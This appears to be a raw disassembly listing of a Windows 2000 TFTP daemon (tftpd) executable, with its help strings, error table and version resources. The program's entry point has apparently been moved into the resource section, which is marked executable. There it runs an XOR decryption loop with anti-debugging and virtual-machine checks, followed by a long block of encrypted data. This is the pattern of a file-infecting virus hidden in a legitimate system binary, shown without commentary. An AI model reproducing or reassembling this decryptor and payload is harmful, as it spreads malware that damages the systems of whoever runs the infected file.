db ' ',0Ah
db ' sc stop tftpd '
db ' ',0Ah
db ' net stop tftpd '
db ' ',0Ah
db ' '
db ' ',0Ah
db 'Variables that control what files can be read/written and by whom'
db ': ',0Ah
db ' StartDirectory - only files there will be accessible. '
db ' ',0Ah
db ' LogFile is created here. '
db ' ',0Ah
db ' ValidClients - Clients matching this ip address can read files'
db '. ',0Ah
db ' eg. you can set it to "157.55.8?.*" '
db ' ',0Ah
db ' ValidMasters - clients matching this can write and read file'
db 's. ',0Ah
db ' eg. you can set it to "" and no one can write'
db '. ',0Ah
db ' ValidReadFiles - only matching files will be served out, eg. "'
db 'r*.t?t"',0Ah
db ' ValidWriteFiles- only matching files will be accepted, eg. "w'
db '*.txt" ',0Ah
db ' '
db ' ',0Ah
db 'Client: '
db ' ',0Ah
db ' tftp [-i] servername {get|put} src_file dest_file '
db ' ',0Ah
db ' -i from binary mode, else ascii mode is used. '
db ' ',0Ah
db ' '
db ' ',0Ah
db ' ================================================================'
db '======== ',0Ah,0
align 8
aTftpd db 'Tftpd',0 ; DATA XREF: sub_1001665+B�o
; .data:off_1005CB0�o
align 10h
off_1005CB0 dd offset aTftpd ; DATA XREF: sub_1001570:loc_1001646�o
; "Tftpd"
dd offset sub_1001665
align 10h
off_1005CC0 dd offset aErrorUndefined ; DATA XREF: sub_100230A+73�r
; "Error undefined"
dd offset aFileNotFound ; "File not found"
dd offset aAccessViolatio ; "Access violation"
dd offset aDiskFullOrAllo ; "Disk full or allocation exceeded"
dd offset aIllegalTftpOpe ; "Illegal TFTP operation"
dd offset aUnknownTransfe ; "Unknown transfer ID"
dd offset aFileAlreadyExi ; "File already exists"
dd offset aNoSuchUser ; "No such user"
dd offset aOptionNegotiat ; "Option negotiation failure"
align 8
dword_1005CE8 dd 2Ah, 0Dh dup(0) ; sub_10037BF+87�o
dword_1005D20 dd 2Ah, 0Dh dup(0) ; sub_100333A+163�o ...
dword_1005D58 dd 2Ah, 0Dh dup(0) ; sub_10037BF+EA�o
dword_1005D90 dd 2Ah, 0Ch dup(0) ; sub_10037BF+11A�o
dword_1005DC4 dd 1 align 10h
dword_1005DD0 dd 0 ; sub_1001E73:loc_1001F36�r ...
dword_1005DD4 dd 0 dword_1005DD8 dd 0 ; sub_1001665:loc_100182E�r ...
dword_1005DDC dd 0 ; sub_1001665+8B�r ...
dword_1005DE0 dd 0 ; sub_1001E73:loc_1001F0C�r ...
align 8
dword_1005DE8 dd 0 ; sub_1001A91+2B3�o
dword_1005DEC dd 0 ; sub_1001A1F+52�r ...
dword_1005DF0 dd 0 ; sub_1001A1F+5E�w ...
dword_1005DF4 dd 0 ; sub_1001A91+59�w ...
dword_1005DF8 dd 0 ; sub_10018DB+EF�r
dword_1005DFC dd 0 dword_1005E00 dd 0 ; sub_1002219+D5�o
db 3 dup(0)
dword_1005E07 dd 0 ; sub_1003910+6B�r ...
align 4
dd 7Ch dup(0)
dword_1005FFC dd 0 dword_1006000 dd 0 dword_1006004 dd 0 dword_1006008 dd 0 dword_100600C dd 0 dd 4 dup(0)
dword_1006020 dd 6 dup(0) ; .text:01001D78�o ...
dword_1006038 dd 0 ; sub_10018DB+34�w ...
dword_100603C dd 0 dword_1006040 dd 0 ; sub_1001DEB:loc_1001E35�r
dword_1006044 dd 0 ; sub_1001665+DB�r ...
dword_1006048 dd 6 dup(0) dword_1006060 dd 6 dup(0) ; sub_1001A1F+2�o ...
dword_1006078 dd 0 ; sub_10019F0+F�w ...
dword_100607C dd 0 dword_1006080 dd 6 dup(0) ; sub_100287F+1�o ...
dword_1006098 dd 0 ; sub_10018DB+25�w ...
dword_100609C dd 0 dword_10060A0 dd 0 ; sub_10018DB+A2�r ...
dd 7 dup(0)
dword_10060C0 dd 0 ; sub_1001665:loc_1001857�o
dword_10060C4 dd 0 dword_10060C8 dd 0 dword_10060CC dd 0 dd 0Ch dup(0)
dword_1006100 dd 4 dup(0) ; sub_1002219:loc_10022E9�o
dword_1006110 dd 0 align 10h
dword_1006120 dd 0 ; sub_1001665+63�o ...
dword_1006124 dd 0 ; sub_1001665+D1�w ...
dword_1006128 dd 0 ; sub_1001665+E1�w
dword_100612C dd 0 ; sub_1001E73+5A�w ...
dword_1006130 dd 0 ; sub_1001E73+60�w ...
dword_1006134 dd 0 ; sub_1001665+EB�w ...
dword_1006138 dd 0 ; sub_1001665+F1�w ...
align 10h
dword_1006140 dd 64h dup(0) dword_10062D0 dd 0 dword_10062D4 dd 0 dword_10062D8 dd 0 align 200h
_data ends
; Section 3. (virtual address 00007000)
; Virtual size : 00007400 ( 29696.)
; Section size in file : 00007400 ( 29696.)
; Offset to raw data for section: 00007000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rsrc segment para public 'CODE' use32
assume cs:_rsrc
;org 1007000h
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
dd 3 dup(0)
dd 10000h, 10h, 80000018h, 3 dup(0)
dd 10000h, 1, 80000030h, 3 dup(0)
dd 10000h, 409h, 48h, 7060h, 374h, 4 dup(0)
dd 340374h, 560000h, 5F0053h, 450056h, 530052h, 4F0049h
dd 5F004Eh, 4E0049h, 4F0046h, 0
dd 0FEEF04BDh, 10000h, 50000h, 8560001h, 50000h, 8560001h
dd 3Fh, 0
dd 40004h, 1, 3 dup(0)
dd 2D4h, 530001h, 720074h, 6E0069h, 460067h, 6C0069h, 490065h
dd 66006Eh, 6Fh, 2B0h, 300001h, 300034h, 300039h, 420034h
dd 30h, 16004Ch, 430001h, 6D006Fh, 610070h, 79006Eh, 61004Eh
dd 65006Dh, 0
aMicrosoftCorpo:
unicode 0, <Microsoft Corporation>,0
aR:
unicode 0, <r%>
dd 460001h, 6C0069h, 440065h, 730065h, 720063h, 700069h
dd 690074h, 6E006Fh, 0
aTcpIpTrivialFi:
unicode 0, <TCP/IP Trivial file transfer daemon.>,0
align 4
a8 db '8',0
dw 0Ch
dd 460001h, 6C0069h, 560065h, 720065h, 690073h, 6E006Fh
dd 0
a5_00_2134_1:
unicode 0, <5.00.2134.1>,0
a4_0:
unicode 0, <4>
dw 0Ah
dd 490001h, 74006Eh, 720065h, 61006Eh, 4E006Ch, 6D0061h
dd 65h, 660074h, 700074h, 2E0064h, 780065h, 65h, 280074h
dd 4C0001h, 670065h, 6C0061h, 6F0043h, 790070h, 690072h
dd 680067h, 74h, 6F0043h, 790070h, 690072h, 680067h, 200074h
dd 430028h, 200029h, 69004Dh, 720063h, 73006Fh, 66006Fh
dd 200074h, 6F0043h, 700072h, 20002Eh, 390031h, 310038h
dd 31002Dh, 390039h, 39h, 0A003Ch, 4F0001h, 690072h, 690067h
dd 61006Eh, 46006Ch, 6C0069h, 6E0065h, 6D0061h, 65h, 660074h
dd 700074h, 2E0064h, 780065h, 65h, 2F007Eh, 500001h, 6F0072h
dd 750064h, 740063h, 61004Eh, 65006Dh, 0
aMicrosoftRWind:
unicode 0, <Microsoft(R) Windows (R) 2000 Operating System>,0
align 4
db '<',0
dw 0Ch
dd 500001h, 6F0072h, 750064h, 740063h, 650056h, 730072h
dd 6F0069h, 6Eh, 2E0035h, 300030h, 32002Eh, 330031h, 2E0034h
dd 31h, 44h, 560001h, 720061h, 690046h, 65006Ch, 6E0049h
dd 6F0066h, 0
dd 40024h, 540000h, 610072h, 73006Eh, 61006Ch, 690074h
dd 6E006Fh, 0
dd 4B00409h, 0Bh dup(0)
assume ds:_data
; =============== S U B R O U T I N E =======================================
public start
start proc near
cld
call loc_100742E
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_1007406 proc near ; CODE XREF: .rsrc:0100747D�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_100740E: ; CODE XREF: sub_1007406+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_100740E
pop ebx
retn
sub_1007406 endp
; ---------------------------------------------------------------------------
db 67h, 0F8h
; ---------------------------------------------------------------------------
loc_100741F: ; CODE XREF: .rsrc:01007468�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_1007421: ; CODE XREF: .rsrc:01007436�j
; .rsrc:01007447�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_1007455
; =============== S U B R O U T I N E =======================================
sub_100742B proc near ; CODE XREF: .rsrc:0100744A�p
; .rsrc:01007450�p
rdtsc
retn
sub_100742B endp
; ---------------------------------------------------------------------------
loc_100742E: ; CODE XREF: start+1�p
test eax, eax
jnz short loc_100743A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_1007421
jmp short loc_1007449
; ---------------------------------------------------------------------------
loc_100743A: ; CODE XREF: .rsrc:01007430�j
push eax
sidt fword ptr [esp-2]
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short loc_1007421
loc_1007449: ; CODE XREF: .rsrc:01007438�j
push ebp
call sub_100742B
xchg eax, ecx
call sub_100742B
loc_1007455: ; CODE XREF: .rsrc:01007429�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 39B6h
sub eax, 100h
jnb short loc_100741F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_1007406
; ---------------------------------------------------------------------------
dw 0F88Ch
dd 5FE33CD4h, 47265C3Fh, 97E0E0E1h, 1BF3346h, 0D5AF5CD4h
dd 0DFA43D2Ch, 0A840176Ah, 8C7AAF70h, 0D8D84FD6h, 0C1AAA2F0h
dd 0E1824B3Ah, 729CF8D4h, 0B57EBBDEh, 0D2974C5Ch, 0D317CE64h
dd 0C6A20909h, 3C36725Ah, 0B2663E91h, 28F164Ch, 6F9570C3h
dd 4B0E5828h, 2B9A3EDBh, 0FE9CD592h, 9E2B90BDh, 26CA2314h
dd 5A14B0C2h, 81A1EF43h, 57FDBAEAh, 0C73826CEh, 54D62E2Eh
dd 0E080ECE8h, 8B369AA9h, 17B30D38h, 219B7D54h, 34220DAh
dd 62D16682h, 0AD5C8AC9h, 40D84C5Ah, 0E583ECE6h, 36B1B4E7h
dd 1463C2CEh, 0BDE5A696h, 7B6D0602h, 0B54969A5h, 0EDD33A3Ah
dd 3759B0DBh, 0BB6E84B3h, 0D8AA66EDh, 9F294342h, 9A39B7D9h
dd 85CC8101h, 58C95275h, 0ADA8643Ch, 4088212Fh, 649A05B8h
dd 5F47DFEDh, 58DE688h, 26B0139Ch, 0C664CDE9h, 0BD79D095h
dd 5238C90h, 1785F43Fh, 0F2BD7B7Ah, 0E254EB64h, 2BD43B39h
dd 4FF99F2h, 0F16FD4E5h, 42FFEF57h, 0A52F3A49h, 8AF71727h
dd 6EED6344h, 6BBFD23Eh, 2DAC2007h, 0A16E6B94h, 2D5AC3DFh
dd 0CFB54CBBh, 0AB19B266h, 606D5599h, 11B7231h, 0C137C0D0h
dd 376B5B9h, 0D39E8FBFh, 8D55EE8Eh, 3720B14Eh, 23149D81h
dd 42F002CDh, 0F3D36C6Fh, 0D4327E46h, 0CC192B1Bh, 82F99F33h
dd 0E2BD68E9h, 0CCB07959h, 911E553Dh, 0FFCAFB08h, 7F22E485h
dd 0B7473A4Dh, 93D4E615h, 4DF62A10h, 56E017E4h, 2CFCCDB8h
dd 0CB16E45Dh, 0FA6A006Bh, 0BB5F9C62h, 3929F2EAh, 0D90C02E5h
dd 7A10058Fh, 0B2D0E0DFh, 5FA62A3Fh, 17069B9Eh, 0F665FE96h
dd 0B750A15Eh, 33248D96h, 0CE0012DDh, 1EE37C7Eh, 0D42A8BDBh
dd 59A23F3Bh, 9FE95B9Ah, 0A36193ADh, 53C05832h, 538A47B9h
dd 797F2832h, 70DF7772h, 0FBDC4328h, 2A753607h, 67FC9596h
dd 0EE5BF65Fh, 0AEE2543Fh, 5210D9BEh, 3C567A81h, 0A8289973h
dd 0E73D6C51h, 25983102h, 89F51D15h, 0E95007F0h, 1CF84F50h
dd 0A859E2EBh, 2B689BF0h, 0D3596D5Eh, 0C603DB73h, 981EE51Eh
dd 84C2A7F5h, 0CC2E75Ah, 43B1488Fh, 8FB91429h, 0D70093Ah
dd 61CD31EDh, 0BCAB4CC8h, 0DF8E1704h, 0FA6287F7h, 0DF7CCEDFh
dd 1595F8C7h, 61F4A495h, 7A640405h, 5CCB665Eh, 90BB4648h
dd 6B752313h, 0FC6C0D83h, 5B48D1CAh, 983C7FCh, 99F85FA0h
dd 0E3E00F00h, 0DCC7605Dh, 870A3E3Bh, 17F6E01Eh, 5E68FBF2h
dd 68C5DDECh, 349416B1h, 94036364h, 0F59E7CF4h, 0DE495B5Bh
dd 0B311963Fh, 637E03F9h, 0EB65F678h, 503FE8F3h, 0B4A285h
dd 8F016897h, 34DAF9F6h, 0A6BD5657h, 0AE1CB453h, 2183A898h
dd 0A3507444h, 15CCD3B9h, 0A89E43CCh, 0CA939173h, 800F08F2h
dd 0C4A03B51h, 99022705h, 86BA910h, 635B6F6Fh, 38CA3083h
dd 0AB3E48D1h, 85F4C089h, 4E35ECECh, 0EFB70BC1h, 0C2BE4F99h
dd 8889E9A0h, 0AD100BEh, 0C230A99Dh, 21FAE5A2h, 80854C03h
dd 0E04EE78Fh, 6EEE2D4Fh, 0CF03CCF4h, 0D2E493F9h, 0DE956655h
dd 0E9448500h, 978C2544h, 0F0EBEE57h, 0B14E892Eh, 68A82942h
dd 0CE61A2CBh, 93690261h, 0A7A33360h, 35BD3EEFh, 48881133h
dd 79180527h, 0D647E259h, 3513B23Dh, 2C05AE8Ch, 0F564F5E9h
dd 0F137B2D7h, 0A423513Ah, 960E1C2Bh, 72D26F7Ch, 47CC3A26h
dd 3191236Bh, 0D09566CAh, 195FC8D4h, 50BF584Eh, 0DB71D8FBh
dd 7D2E6762h, 2B4001Fh, 9859B2B0h, 48E95954h, 73AB94D5h
dd 0DC712A66h, 963FDA53h, 0FB198299h, 60597846h, 0FC4D8E8Eh
dd 4C37E0FCh, 17E26FF0h, 0D1F4E519h, 8D8165B8h, 575D1C4Fh
dd 0F514ADADh, 67114968h, 16830B19h, 0A85BBDA2h, 23F74C4Eh
dd 5F6475DCh, 6950D9C2h, 17E61F8Dh, 5E58FEF8h, 3043719Dh
dd 4F0AE467h, 72B83991h, 748D160Dh, 82EEEF85h, 0ED67E171h
dd 3D83FD44h, 0B79DA3A3h, 0DF668AE2h, 0CF353436h, 0BA19EE90h
dd 0BC0AD412h, 78D8AD6Dh, 2710B4DFh, 78B15AAh, 0E3C61A9Eh
dd 9E6B8A2h, 0A92B2C5Ah, 0DC2C99C9h, 0EAAE771Dh, 44CF31E9h
dd 0A0825EDBh, 0C64AA8E7h, 0A0019A9Eh, 0C3836833h, 7E2DDC63h
dd 9A6AB889h, 19FD998h, 248E7778h, 806C8087h, 0BA626567h
dd 8ECCBE6Bh, 9A023470h, 69CFAB5Ah, 409F3CBCh, 0E47A2338h
dd 94268F1Fh, 6AD2E81h, 0C1980119h, 0A1331109h, 0BE56EFF1h
dd 637BDAAFh, 3DEAAE9Fh, 74525C2h, 992E8387h, 0C633CC32h
dd 16C92C2Dh, 0D5A3DA45h, 0E45082BAh, 873A4A4Fh, 0AF7AF9FBh
dd 0C122CD81h, 35B90D3Fh, 3ECE2FC8h, 0B503D8D7h, 7FDD93CBh
dd 8F1DB4B4h, 157DD0B9h, 5A88A495h, 2E0C725h, 5C933C3Ch
dd 0BC2AE397h, 1B8A3381h, 7AE98283h, 0DA48E1E1h, 39A84141h
dd 6654F6F1h, 0C84CD995h, 0FB9ECB5Fh, 4C537F3Ah, 4A45F1FCh
dd 10961F3Fh, 0B029BC92h, 5EC67258h, 0E777FFFEh, 9707A8A7h
dd 21AB0D2Fh, 0DF21CFCEh, 71F36E69h, 1DE00D18h, 0BD4DACABh
dd 739F565Dh, 0FB9FF2E5h, 8334B093h, 0DBD1733h, 0DA7DD0C7h
dd 61155370h, 1CBA3911h, 0AB54BAA3h, 59D93372h, 0EF8DF3F7h
dd 893783A1h, 8CB2234h, 0CC65F3B0h, 5A126471h, 13B9020Ah
dd 0B55D9AABh, 26F14F4Bh, 0E491FFCEh, 8D078998h, 20D2293Eh
dd 0C160E8ABh, 57177F6Ah, 0ABD0505h, 0F140A5ACh, 40FE7A1Bh
dd 0EF87FBF8h, 980BE793h, 57FA332Eh, 0FB6CC3D4h, 8A084106h
dd 38A10F23h, 0CF58B185h, 68F9474Dh, 7BAAF7E6h, 9D3E86A5h
dd 69CF2F2Bh, 9A6CD8C8h, 0BF1D6746h, 0CAC0E09h, 0B84DACD6h
dd 5AFC4458h, 1A92E411h, 0BA2F99B8h, 58C77158h, 0D205DFF9h
dd 9A298999h, 31A82838h, 0D04DDDF3h, 13C27977h, 21961E3Dh
dd 0B735A9A0h, 43C87E54h, 0FE74FAFDh, 0F11E818Ah, 4CB3D1Fh
dd 0F66EDAD2h, 411B7B7Eh, 2FB81B17h, 0BA5992D5h, 5DF15061h
dd 0E48FF5C4h, 891DF3B2h, 39DF0527h, 0C576DBC1h, 7E1C5512h
dd 1AAA1427h, 8C59BFB9h, 6F977148h, 0E8A0FBEAh, 82389B82h
dd 29D32007h, 0D275C0DFh, 441A6264h, 10B62B6Ch, 0A05CA29Ch
dd 67E15C44h, 0E194F8E3h, 9B22869Dh, 2EDC0E49h, 0E063C9CAh
dd 63006464h, 3EA12B67h, 0DD448AA2h, 67FF4754h, 1CA185C4h
dd 0B822B294h, 7ACD0B33h, 9C6FCFCAh, 950F734Ch, 3FA60A24h
dd 0CA59A38Ch, 58EE4C48h, 1D98CE80h, 0B735B0B1h, 44D4255Ch
dd 0F874CF9Eh, 84169B9Dh, 3F836C6Dh, 0B650CECFh, 76EB6F4Dh
dd 47900F19h, 0AC2795E9h, 56F03B4Fh, 0FA47FEFBh, 0A0609C96h
dd 3B862D3Fh, 0C65EDDD5h, 73166A6Dh, 3BB030Dh, 0B56ED696h
dd 43F47043h, 0E793C5F3h, 9C3E809Bh, 39DE0755h, 0C876DAF2h
dd 69177A40h, 0EB52173h, 9E38A1B7h, 5AF95C5Ch, 0FE92F9C7h
dd 801089BFh, 1EB62A3Ch, 0DD61DCC6h, 6B34626Eh, 66B70202h
dd 0B25ABE9Ah, 49FA6A48h, 0F0BC8BE9h, 913B8EAAh, 31E13E38h
dd 0CF79DFC3h, 71156E6Fh, 4A4073Dh, 0B560C7A6h, 41EB556Bh
dd 16ABE3F3h, 914C808Ah, 5BDE0632h, 0CE6ED0C4h, 98086B77h
dd 12CB1717h, 0D95880B7h, 4BEF5742h, 1F8AEDF0h, 0A20D9292h
dd 7ADC0F41h, 0ED66C5D2h, 9B025365h, 39A8092Bh, 0FA52F1BEh
dd 7FD06F7Fh, 13AA0918h, 0A127B88Fh, 34CA5255h, 0E44CE8D5h
dd 9D24959Eh, 1DC23E37h, 0D651F5CEh, 7DF34A74h, 2931C1Ah
dd 0B454B78Ch, 44D13856h, 0E19BE7D8h, 9B3E93A5h, 4ED3393Fh
dd 0DC4CC1FBh, 6E19617Ah, 1EB22200h, 0A05BA6A7h, 44F7567Eh
dd 0C4F9EBE0h, 8F2DA085h, 30EB2823h, 0C472C4C3h, 67117E59h
dd 13B7021Dh, 0C75BA1A7h
dd 54C25A60h, 0D391F9E4h, 90279E85h, 21FE202Dh, 0DD60C4C6h
dd 6F06590Bh, 1B8043Fh, 9155ADA6h, 4FF95B5Dh, 0C180DCEFh
dd 0B3279489h, 51C73533h, 0CC5AA6C1h, 9F195547h, 2DB81217h
dd 0D240A6C4h, 73FF4057h, 0F8EEFE0h, 0B52580E2h, 4EC9262Ch
dd 0EE6CC5A1h, 8D1A6D69h, 39A71B02h, 0CA28A4D2h, 17FE427Ah
dd 1289E50Dh, 0B529ACDDh, 35D25A56h, 0F071F0D5h, 8101938Eh
dd 27AB311Fh, 0DA42F4DEh, 13E6707Fh, 17961533h, 0A624B4ABh
dd 72D55F7Eh, 0F46EF7F7h, 953A8C9Bh, 24DE2C0Bh, 0DE57B7D2h
dd 610C7263h, 1E920213h, 0CE7DBBB0h, 48E85B7Ch, 0F89EFAE6h
dd 823F83BCh, 0AD62106h, 0DF77FBB2h, 6F176077h, 8BD2305h
dd 0A55E96B4h, 6CD63055h, 0CEA6CED9h, 0A37BDCDDh, 14B50202h
dd 0CA57CAC8h, 4E117E62h, 36D31509h, 0B47DACAEh, 46D9454Eh
dd 0C389CFF3h, 8535BBE9h, 33D53C18h, 0CD6EFED1h, 782A6D7Dh
dd 3A9C6726h, 0CB4895A1h, 6BE14770h, 3C94C0E0h, 0D8A267E4h
dd 54FA8C6Fh, 740AA3A3h, 0F84E4F8Eh, 5FA06308h, 0D07A9290h
dd 4945A924h, 2CB8550Bh, 8A16A0B5h, 0AA32BF6Ch, 1406AFB2h
dd 629AF23Ah, 56F572FBh, 752C793Eh, 0BC01904Ah, 47E34C69h
dd 0D4288B24h, 0A65D3551h, 9331B6D3h, 776F397Fh, 52C059CAh
dd 0D24BD0E9h, 0C5F41819h, 0BC557712h, 0D05596BDh, 459D2637h
dd 8E96C794h, 0EE3BA09Dh, 1CBB3E55h, 38E5E3E7h, 0C4A3F99h
dd 0FE262B2Ch, 0CB08FA1Fh, 76ECCEB7h, 9C771D1Ah, 0E5B5EFC0h
dd 58B6DADDh, 7916AE9Fh, 0D58A5D58h, 4AA9E8E5h, 49BECCFDh
dd 25933715h, 7B0DDF64h, 75D46114h, 0CEB17A67h, 0A30B2C25h
dd 0FD33E10Ah, 0E4449796h, 0C11EEB49h, 3B02A8A5h, 4D058687h
dd 54B31A19h, 0E80C0C3h, 0EACB21A5h, 64E4890Eh, 0B4CB647Fh
dd 43D53CDEh, 0D8D5E4A8h, 7AE96AD7h, 5B15E1E1h, 9B2C7ACh
dd 14CE93A0h, 0C847E085h, 693315Fh, 0E677EFEFh, 3A878AE1h
dd 71627E4Dh, 18D122F8h, 69A40D17h, 0C1039859h, 0F462FB13h
dd 0BE43065Bh, 0B311A00Fh, 870CE570h, 71D063F9h, 0F1F28A88h
dd 30B5381Ch, 0E9F25314h, 0F59B7331h, 6E705666h, 0B4D43072h
dd 0D581525h, 0AF86745Eh, 0CD50D2B9h, 586500CCh, 0FEC6D96h
dd 82A88531h, 49B8515Ah, 0AA4C603Bh, 0BDFA2C40h, 67E6758Bh
dd 0C6397445h, 0AC1E2E2Eh, 85F48C85h, 2E7814EFh, 0B778C72Ch
dd 0A166CA0Dh, 0E887E94Ch, 6D16E9A8h, 91E4429Eh, 75C0E5A2h
dd 0D2BEC8E2h, 75B1188Dh, 3F9E6BDAh, 14016225h, 0CE410F93h
dd 0DE1A4D65h, 0BAEBC22Eh, 1C64254Eh, 0B8E8D30Ah, 0F7BD768Bh
dd 0BEAF4372h, 5A3AAAA9h, 7073B243h, 68E595F5h, 35CA36BFh
dd 0E922405Dh, 0B506F5B7h, 0D6463788h, 0B4FB3F3Dh, 0A51EE871h
dd 0EF976FCh, 0D7C46D70h, 0B42B98C7h, 133A9814h, 9E637B7Ah
dd 0D241D8D1h, 30A5526Dh, 4FF9998h, 0F16FD4D1h, 0D432A4D3h
dd 0B01FB393h, 0F144717h, 6EDD729Eh, 9A6E83D5h, 0B8636235h
dd 8CCBB8B1h, 7BD73AC0h, 4BBA5257h, 0A973E3E3h, 62787843h
dd 29D87171h, 38A22F82h, 0BE97001Bh, 0DC82790Ah, 0E33DBABEh
dd 11B54E4Fh, 86301952h, 0FA740D0Fh, 54FFB5F9h, 4B792CBh
dd 37713D5Fh, 0E82501DAh, 0B501BBE9h, 3425B61Fh, 0F80F9884h
dd 0D01AC88Dh, 925B9831h, 322DF6EDh, 49DF6271h, 0F0B4C1EFh
dd 0DD4AE073h, 0FC98EF44h, 6F53B3C9h, 0AB3A53A8h, 0A9A3332h
dd 43BC3D93h, 9889120Ah, 78EA8944h, 0FC331FDFh, 0FE32BF37h
dd 0C406AFB2h, 0DBAC6B01h, 94985E6Eh, 88A4BDB9h, 53856817h
dd 619FF1F7h, 0CDA1DBEBh, 23A2AEB6h, 42029AAAh, 77B206ACh
dd 0AD48569Ah, 0BD1FB8B9h, 117FE89Dh, 4AE0F778h, 507BC6A2h
dd 0AB923609h, 8EFC9577h, 9B7BCA75h, 733A12A4h, 0EA54FAE4h
dd 0C3F13161h, 24D834B5h, 0A1691FF9h, 79CE6032h, 0A536056Eh
dd 0D20FEFC0h, 0F7334091h, 4115AEAFh, 7750EBEh, 348453EFh
dd 433C9A84h, 25932C88h, 28FA4D0Fh, 605EE7D7h, 43B14AD2h
dd 50658996h, 0D4A35A6h, 61CFE4ECh, 0E1236AC8h, 1DAE0708h
dd 0B88E1A6h, 0E3E09A93h, 0BFD03066h, 0F62B5BDBh, 8C1E7071h
dd 2CC81AE5h, 0C905ECF9h, 0E4CDE54Bh, 0C0D88D82h, 0DA48C6F1h
dd 0C6FAA3B6h, 0A92BC935h, 0A8A73300h, 0BF97300Fh, 0B726BFB7h
dd 78F1705Ah, 11841111h, 4D122DCh, 0B1A40D10h, 0A735E85Bh
dd 0FE77232h, 2C26B77h, 0B322BAD2h, 44D04B9Eh, 0A4758629h
dd 5C3FE8F4h, 8448ADh, 46CDC797h, 0BD0DA7A2h, 0DB420707h
dd 0AE2C99B4h, 0F2581192h, 5CF0B9E1h, 4CF92BD3h, 1B8F5CBEh
dd 49009392h, 0EE7CAD7Ah, 49B851B9h, 4496EDB0h, 8470D6Dh
dd 5795D2E4h, 72BECEFEh, 26A51E65h, 87F768Eh, 0E563DCABh
dd 0C138E9BFh, 0A4229BE8h, 334D9E80h, 0E7D26A5Ah, 0C200F9FEh
dd 0A9F82BA0h, 7FEF889Bh, 0D0628E72h, 6367AC47h, 0F67BC3E2h
dd 0AE316365h, 34BE1F0Dh, 0F040A4A7h, 6EE34841h, 0A9D884FAh
dd 2D182C69h, 0DB29119Bh, 9949C8A2h, 933B55F8h, 0E37CEF78h
dd 128F1A2h, 17882108h, 88AA84F3h, 0B0B92022h, 78A2B296h
dd 95059E9Ch, 0B2E9569Ah, 0B0F6F658h, 5688DA17h, 201691E0h
dd 26E24B4Ah, 2D13DCB3h, 18DA3ACh, 0B5741298h, 0E99B7BF0h
dd 0D5B098DDh, 0B01EB612h, 2F16177Dh, 38DD7677h, 5BC3DEBFh
dd 2DAC1994h, 7F7CA1Fh, 71D3E3BDh, 4B8A6364h, 9B223F3Bh
dd 0E9F81222h, 66278171h, 0C95D8381h, 9D68365Ah, 87C6BFBCh
dd 0CB107B11h, 0B9E54E7Eh, 96249E18h, 0C8E1F20Dh, 3CD35C47h
dd 0CBA10B4Eh, 23937FAFh, 0B970EC8Ah, 0EE24B3A4h, 2C25B61Ah
dd 480F9884h, 6F0949h, 5F06D9EAh, 822C6C6h, 6A003868h
dd 79849AB4h, 8A4BE4E5h, 108AD1BBh, 0CB5CA393h, 0D08396FCh
dd 19416352h, 31EAC1FDh, 0CA8A5A71h, 0F3C8F30Bh, 0ECCAF895h
dd 340A110Ch, 967E1E5Dh, 8500AD9Bh, 0A4275B2Ah, 9F8956E4h
dd 670F3911h, 87E02558h, 0DB5E8950h, 30EC3F8Ch, 11351149h
dd 0BDEB0AF9h, 6D75D052h, 391F8889h, 26CA232Fh, 2DE4748h
dd 0E788FD54h, 149D0607h, 0BECCAE23h, 9FD8FBF5h, 7E44ABAAh
dd 0EEAF3A74h, 857A2324h, 5BE935FEh, 0A16881D2h, 2BF26131h
dd 89F790F9h, 6CA9B870h, 48865A28h, 83E43B50h, 8A8A0E3Fh
dd 66E47816h, 0C9CC344Eh, 0DA6C17A9h, 0B7770273h, 8E51DADBh
dd 15B1204Bh, 0C28556FAh, 89703926h, 51FF2FECh, 0C3CE06C8h
dd 20E47778h, 53D01378h, 5AC5E5D6h, 3E9C750Dh, 9E61702Eh
dd 0AD59FB57h, 6CF8D19Bh, 29D5C3F3h, 1BBA0F7Ah, 4ADA0709h
dd 0DEC1E1D1h, 0F43DBE65h, 1207908Bh, 4DEC3C53h, 57F75014h
dd 833CEB35h, 83ADE195h, 75D54E4Ah, 0E5035057h, 1F093D0Ch
dd 6EE13759h, 0E9167E76h, 2935B6Bh, 0E270EAE9h, 3E808FE5h
dd 8EB07949h, 0E114154Dh, 43BAFB38h, 0EAC4BDADh, 833F9798h
dd 0E873233h, 0C279DDC6h, 234E2679h, 40B71810h, 9F3AE2FEh
dd 6ECE606Ah, 0FFBACEDFh, 843D8383h, 27D71225h, 0C578C2C4h
dd 54037543h, 11A40A3Ch, 0B450ADA7h, 47FD7D72h, 0C490E8FFh
dd 96368F8Fh, 25E3103Fh, 0C17FCAD9h, 70006E7Fh, 10B82C36h
dd 0AE51BEACh, 4DFF7945h, 0DC96EBE1h, 8E2F93B4h, 5BDC2623h
dd 0F962D4F6h, 0A2086A6Fh, 35B91324h, 0C745B7ABh, 6CCD4141h
dd 1882E8F3h, 0B4239783h, 76F6302Ch, 9A7DD1C8h, 0AD2F4D52h
dd 1D9B2337h, 0DB418CE3h, 78FB4E6Dh, 21BBF418h, 0B922B1B4h
dd 76FA4C4Ah, 0F077ECE9h
dd 90328992h, 3BAD2E2Eh, 0CC66E0D5h, 61EC706Bh, 26E2091Fh
dd 0B726A8B8h, 42CE724Dh, 910299ECh, 0B50CA8F8h, 22CF5E48h
dd 0DD77CFD8h, 640A7939h, 1EB11804h, 0A055FBB4h, 639C5A53h
dd 0ACB0D7DDh, 8822909Ah, 2ADD243Bh, 0EE4AE7B8h, 401F3240h
dd 4996383Eh, 0BB5EA6F6h, 22A44544h, 87F667DAh, 6608EEEEh
dd 7695A8A3h, 0C9916BADh, 5743D18h, 48FEF993h, 2CF3CBFBh
dd 49C35F34h, 63440194h, 0BB50D9C2h, 349E75E5h, 9F8ECE82h
